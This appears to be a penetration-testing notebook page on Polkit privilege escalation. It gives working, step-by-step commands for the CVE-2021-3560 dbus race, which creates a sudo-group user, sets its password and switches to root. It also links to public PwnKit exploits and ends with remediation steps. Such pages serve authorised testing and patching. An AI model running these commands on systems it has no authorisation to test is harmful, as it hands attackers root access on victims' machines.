Linux Privilege Escalation
  • Ansible Playbook Privilege Escalation
  • Apache Conf Privilege Escalation
  • Bash eq Privilege Escalation
  • Buffer Overflow Privilege Escalation
  • Chrome Remote Debugger Pentesting
  • Doas Privilege Escalation
  • Ghidra Debug Mode RCE
  • Gnuplot Privilege Escalation
  • LXC/LXD (Linux Container/Daemon) Privilege Escalation
  • Linux Privilege Escalation
  • Mozilla Pentesting
  • OpenSSL Privilege Escalation
  • Pip Download Code Execution
  • PolKit Privilege Escalation
  • Python Eval Code Execution
  • Python Jails Escape
  • Python Privilege Escalation
  • Python Yaml Privilege Escalation
  • Ruby Privilege Escalation
  • Rust Privilege Escalation
  • SSSD Privilege Escalation
  • Shared Library Hijacking
  • Snapd Privilege Escalation
  • Sudo ClamAV Privilege Escalation
  • Sudo Dstat Privilege Escalation
  • Sudo Exiftool Privilege Escalation
  • Sudo Fail2ban Privilege Escalation
  • Sudo Git Privilege Escalation
  • Sudo Java Privilege Escalation
  • Sudo OpenVPN Privilege Escalation
  • Sudo Path Traversal Privilege Escalation
  • Sudo Privilege Escalation
  • Sudo Privilege Escalation by Overriding Shared Library
  • Sudo Reboot Privilege Escalation
  • Sudo Screen Privilege Escalation
  • Sudo Service Privilege Escalation
  • Sudo Shutdown, Poweroff Privilege Escalation
  • Sudo Systemctl Privilege Escalation
  • Sudo Tee Privilege Escalation
  • Sudo Umount Privilege Escalation
  • Sudo Vim Privilege Escalation
  • Sudo Wall Privilege Escalation
  • Sudo Wget Privilege Escalation
  • Sudoedit Privilege Escalation
  • Tar Wildcard Injection PrivEsc
  • Update-Motd Privilege Escalation
  • irb (Interactive Ruby Shell) Privilege Escalation
  • Linux Backdoors
  • Linux Pivoting
  • Post eploitation
Powered by GitBook
On this page
  • CVE-2021-3560
  • CVE-2021-4034 (PwnKit)
  • Remediations
  • References

PolKit Privilege Escalation

Polkit (PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged ones.

CVE-2021-3560

1. Send a dbus message to create a new user

Create a new user by sending a dbus message.

# string:tester: The new user named "tester".
# string:"Tester Account": The description of the new user.
# int32:1: sudo group
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:tester string:"Tester Account" int32:1 & sleep 0.005s; kill $!
Copied!

Then check the new user ID (uid).

id tester

uid=1000(tester) gid=1000(tester) groups=1000(tester),27(sudo)
Copied!

2. Generate a new password hash

# -6: SHA512
openssl passwd -6 password123
Copied!

Copy the output hash.

3. Send a dbus message to set a new password

dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'<password_hash>' string:'Ask the tester' & sleep 0.005s; kill $!
Copied!

4. Switch the new user

su tester
Copied!

Enter the password you created e.g. “password123”. Now change to root .

sudo -s
# or
sudo su root
Copied!

CVE-2021-4034 (PwnKit)

PwnKit is vulnerability of Polkit to local privilege escalation. There are many exploits available. Below are examples:

  • https://github.com/arthepsy/CVE-2021-4034

  • https://github.com/ly4k/PwnKit

  • https://github.com/berdav/CVE-2021-4034

  • https://github.com/Almorabea/pkexec-exploit (this is written by Python)

Remediations

To avoid the vulnerability, unset setuid from the pkexec executable.

sudo chmod 0755 /usr/bin/pkexec
# or
sudo chmod 0755 `which pkexec`
Copied!

Or simply upgrade the apt packages in most of distributions which are patched for the vulnerability.

sudo apt update && sudo apt upgrade
Copied!

References

  • https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt

PreviousPip Download Code ExecutionNextPython Eval Code Execution

Last updated 1 year ago

Page cover image